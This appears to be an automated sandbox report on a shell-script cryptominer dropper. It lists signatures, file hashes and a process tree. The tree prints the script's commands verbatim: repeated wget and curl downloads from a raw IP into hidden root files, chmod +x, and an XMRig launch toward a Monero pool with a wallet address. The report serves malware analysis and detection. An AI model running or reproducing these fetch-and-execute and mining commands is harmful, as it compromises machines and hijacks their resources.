Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240418-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    21/10/2024, 01:53

General

  • Target

    37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh

  • Size

    700B

  • MD5

    c4d089011765cf8fa828d28b6eeeac3e

  • SHA1

    43d933e706b0eefd0db2b5acba19205ebc1af2bd

  • SHA256

    37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19

  • SHA512

    3f55a27fc44062f48d0ee1c11c7b2ece0d3478e89744618d337dd2854b3b68e7e6161d0e38e21b32b4f85a1ee2d2fb523c7b94cc984fdff36ef65a9ddf45bae9

Malware Config

Signatures

  • XMRig Miner payload 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • File and Directory Permissions Modification 1 TTPs 21 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 12 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates kernel/hardware configuration 1 TTPs 1 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 1 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

Processes

  • /tmp/37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh
    /tmp/37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh
    1⤵
      PID:718
      • /usr/bin/wget
        wget 205.185.117.101/log2 -O /dev/null
        2⤵
          PID:720
        • /usr/bin/curl
          curl -L 205.185.117.101/log2 -o /dev/null
          2⤵
          • Reads runtime system information
          PID:738
        • /usr/bin/wget
          wget 205.185.117.101/__min__ -O /.__min__
          2⤵
            PID:747
          • /usr/bin/wget
            wget 205.185.117.101/__min__c -O /.__min__c
            2⤵
              PID:824
            • /usr/bin/wget
              wget 205.185.117.101/__min__m -O /.__min__m
              2⤵
                PID:825
              • /bin/chmod
                chmod +x /.__min__
                2⤵
                • File and Directory Permissions Modification
                PID:829
              • /bin/chmod
                chmod +x /.__min__c
                2⤵
                • File and Directory Permissions Modification
                PID:830
              • /bin/chmod
                chmod +x /.__min__m
                2⤵
                • File and Directory Permissions Modification
                PID:831
              • /usr/bin/nproc
                nproc --all
                2⤵
                • Enumerates kernel/hardware configuration
                PID:832
              • /bin/hostname
                hostname
                2⤵
                  PID:834
                • /.__min__c
                  /.__min__c
                  2⤵
                  • Executes dropped EXE
                  PID:835
                • /.__min__
                  /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-mipsel-20240418-en-14 --tls -k
                  2⤵
                  • Executes dropped EXE
                  • System Network Configuration Discovery
                  PID:837
                • /usr/bin/wget
                  wget 205.185.117.101/__min__ -O /.__min__
                  2⤵
                    PID:840
                  • /usr/bin/wget
                    wget 205.185.117.101/__min__c -O /.__min__c
                    2⤵
                      PID:841
                    • /usr/bin/wget
                      wget 205.185.117.101/__min__m -O /.__min__m
                      2⤵
                        PID:842
                      • /bin/chmod
                        chmod +x /.__min__c
                        2⤵
                        • File and Directory Permissions Modification
                        PID:843
                      • /bin/chmod
                        chmod +x /.__min__m
                        2⤵
                        • File and Directory Permissions Modification
                        PID:844
                      • /.__min__c
                        /.__min__c
                        2⤵
                        • Executes dropped EXE
                        PID:845
                      • /usr/bin/wget
                        wget 205.185.117.101/__min__c -O /.__min__c
                        2⤵
                          PID:847
                        • /usr/bin/wget
                          wget 205.185.117.101/__min__m -O /.__min__m
                          2⤵
                            PID:848
                          • /bin/chmod
                            chmod +x /.__min__c
                            2⤵
                            • File and Directory Permissions Modification
                            PID:849
                          • /bin/chmod
                            chmod +x /.__min__m
                            2⤵
                            • File and Directory Permissions Modification
                            PID:850
                          • /.__min__c
                            /.__min__c
                            2⤵
                            • Executes dropped EXE
                            PID:851
                          • /usr/bin/wget
                            wget 205.185.117.101/__min__c -O /.__min__c
                            2⤵
                              PID:853
                            • /usr/bin/wget
                              wget 205.185.117.101/__min__m -O /.__min__m
                              2⤵
                                PID:854
                              • /bin/chmod
                                chmod +x /.__min__c
                                2⤵
                                • File and Directory Permissions Modification
                                PID:855
                              • /bin/chmod
                                chmod +x /.__min__m
                                2⤵
                                • File and Directory Permissions Modification
                                PID:856
                              • /.__min__c
                                /.__min__c
                                2⤵
                                • Executes dropped EXE
                                PID:857
                              • /usr/bin/wget
                                wget 205.185.117.101/__min__c -O /.__min__c
                                2⤵
                                  PID:859
                                • /usr/bin/wget
                                  wget 205.185.117.101/__min__m -O /.__min__m
                                  2⤵
                                    PID:860
                                  • /bin/chmod
                                    chmod +x /.__min__c
                                    2⤵
                                    • File and Directory Permissions Modification
                                    PID:861
                                  • /bin/chmod
                                    chmod +x /.__min__m
                                    2⤵
                                    • File and Directory Permissions Modification
                                    PID:862
                                  • /.__min__c
                                    /.__min__c
                                    2⤵
                                    • Executes dropped EXE
                                    PID:863
                                  • /usr/bin/wget
                                    wget 205.185.117.101/__min__c -O /.__min__c
                                    2⤵
                                      PID:865
                                    • /usr/bin/wget
                                      wget 205.185.117.101/__min__m -O /.__min__m
                                      2⤵
                                        PID:866
                                      • /bin/chmod
                                        chmod +x /.__min__
                                        2⤵
                                        • File and Directory Permissions Modification
                                        PID:867
                                      • /bin/hostname
                                        hostname
                                        2⤵
                                          PID:868
                                        • /.__min__
                                          /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-mipsel-20240418-en-14 --tls -k
                                          2⤵
                                          • Executes dropped EXE
                                          • System Network Configuration Discovery
                                          PID:869
                                        • /usr/bin/wget
                                          wget 205.185.117.101/__min__ -O /.__min__
                                          2⤵
                                            PID:871
                                          • /bin/chmod
                                            chmod +x /.__min__c
                                            2⤵
                                            • File and Directory Permissions Modification
                                            PID:872
                                          • /bin/chmod
                                            chmod +x /.__min__m
                                            2⤵
                                            • File and Directory Permissions Modification
                                            PID:873
                                          • /.__min__c
                                            /.__min__c
                                            2⤵
                                            • Executes dropped EXE
                                            PID:874
                                          • /usr/bin/wget
                                            wget 205.185.117.101/__min__c -O /.__min__c
                                            2⤵
                                              PID:876
                                            • /usr/bin/wget
                                              wget 205.185.117.101/__min__m -O /.__min__m
                                              2⤵
                                                PID:877
                                              • /bin/chmod
                                                chmod +x /.__min__c
                                                2⤵
                                                • File and Directory Permissions Modification
                                                PID:878
                                              • /bin/chmod
                                                chmod +x /.__min__m
                                                2⤵
                                                • File and Directory Permissions Modification
                                                PID:879
                                              • /.__min__c
                                                /.__min__c
                                                2⤵
                                                • Executes dropped EXE
                                                PID:880
                                              • /usr/bin/wget
                                                wget 205.185.117.101/__min__c -O /.__min__c
                                                2⤵
                                                  PID:882
                                                • /usr/bin/wget
                                                  wget 205.185.117.101/__min__m -O /.__min__m
                                                  2⤵
                                                    PID:883
                                                  • /bin/chmod
                                                    chmod +x /.__min__c
                                                    2⤵
                                                    • File and Directory Permissions Modification
                                                    PID:884
                                                  • /bin/chmod
                                                    chmod +x /.__min__m
                                                    2⤵
                                                    • File and Directory Permissions Modification
                                                    PID:885
                                                  • /.__min__c
                                                    /.__min__c
                                                    2⤵
                                                    • Executes dropped EXE
                                                    PID:886
                                                  • /usr/bin/wget
                                                    wget 205.185.117.101/__min__c -O /.__min__c
                                                    2⤵
                                                      PID:888
                                                    • /bin/chmod
                                                      chmod +x /.__min__
                                                      2⤵
                                                      • File and Directory Permissions Modification
                                                      PID:889
                                                    • /bin/hostname
                                                      hostname
                                                      2⤵
                                                        PID:890
                                                      • /.__min__
                                                        /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-mipsel-20240418-en-14 --tls -k
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • System Network Configuration Discovery
                                                        PID:891
                                                      • /usr/bin/wget
                                                        wget 205.185.117.101/__min__ -O /.__min__
                                                        2⤵
                                                          PID:893
                                                        • /usr/bin/wget
                                                          wget 205.185.117.101/__min__m -O /.__min__m
                                                          2⤵
                                                            PID:894
                                                          • /bin/chmod
                                                            chmod +x /.__min__c
                                                            2⤵
                                                            • File and Directory Permissions Modification
                                                            PID:895
                                                          • /bin/chmod
                                                            chmod +x /.__min__m
                                                            2⤵
                                                            • File and Directory Permissions Modification
                                                            PID:896
                                                          • /.__min__c
                                                            /.__min__c
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:897
                                                          • /usr/bin/wget
                                                            wget 205.185.117.101/__min__c -O /.__min__c
                                                            2⤵
                                                              PID:899
                                                            • /usr/bin/wget
                                                              wget 205.185.117.101/__min__m -O /.__min__m
                                                              2⤵
                                                                PID:900

                                                            Network

                                                                  MITRE ATT&CK Enterprise v15

                                                                  Replay Monitor

                                                                  Loading Replay Monitor...

                                                                  Downloads

                                                                  • /.__min__

                                                                    Filesize

                                                                    8.2MB

                                                                    MD5

                                                                    8f96e8b4e9d26884c776c1b42a70bae5

                                                                    SHA1

                                                                    53a4166052211abf77e1edf0d71c7a6faae12cc5

                                                                    SHA256

                                                                    5e5fd0bc5f1bd663d7ccc2695c2b56bd382df3c7fdac605eb0ce3c0d5df24dc4

                                                                    SHA512

                                                                    4709a5ee74cf3e91472b64891eaf9cd7cd8bde6059be6fd892863274c505fd3cf5f5631d66d01ab645406adb76b6123d287d97e90a6c08bf8f8a935a6624dcec

                                                                  • /.__min__

                                                                    Filesize

                                                                    5.2MB

                                                                    MD5

                                                                    dc32e92b600c8e7f2c3fb65e7ea6cbac

                                                                    SHA1

                                                                    be717f5490537cb5e222c178f0bd93534a166e67

                                                                    SHA256

                                                                    939d145d0baa07b0febb17d5cff0765a5f27f5500b520ed66c6e2205a697440a

                                                                    SHA512

                                                                    ece31e619ce7e6dcdca4a6c65a1ce689a30663a8e630eea316d79b3ad70d5b8c4dc28d30b836c27e8151e1d07ea62377ae8765d0f6144a31a91559c171b6022b

                                                                  • /.__min__c

                                                                    Filesize

                                                                    1.6MB

                                                                    MD5

                                                                    d3e378df1f5f920faaf9ef9e14a54f55

                                                                    SHA1

                                                                    b039ff3865762819392cec53eeac7c8ee0a630c3

                                                                    SHA256

                                                                    58fa45ce3665fd665bde9589297a5a34c8df403e8732eb7bdc77d00c669fac29

                                                                    SHA512

                                                                    40ad13e858412d4d809d5eccb55c4e31ab65183f9064daea2d2b5e5bb311de4d43121337bb523ff1128cb9bd61319367de7e62f96ed2065b680f53371623d358

                                                                  • /.__min__m

                                                                    Filesize

                                                                    2.9MB

                                                                    MD5

                                                                    d98aa7684a42d8197b0eb2946c6d4fab

                                                                    SHA1

                                                                    a5a7cb1c92f7c9ce302caaaab7d52f70ce7564da

                                                                    SHA256

                                                                    bacd68209fed7455e465c223d55af9574e23616f94e52c1c10ee7a1b8673898e

                                                                    SHA512

                                                                    e2cce2d0e96546bfe233e8294d49ed020db89c2a5968e57a2d84b9cd02cf71060805d765050792d81d0a238cf22eb41a030d6364256115bba5f43cb40f99b1ee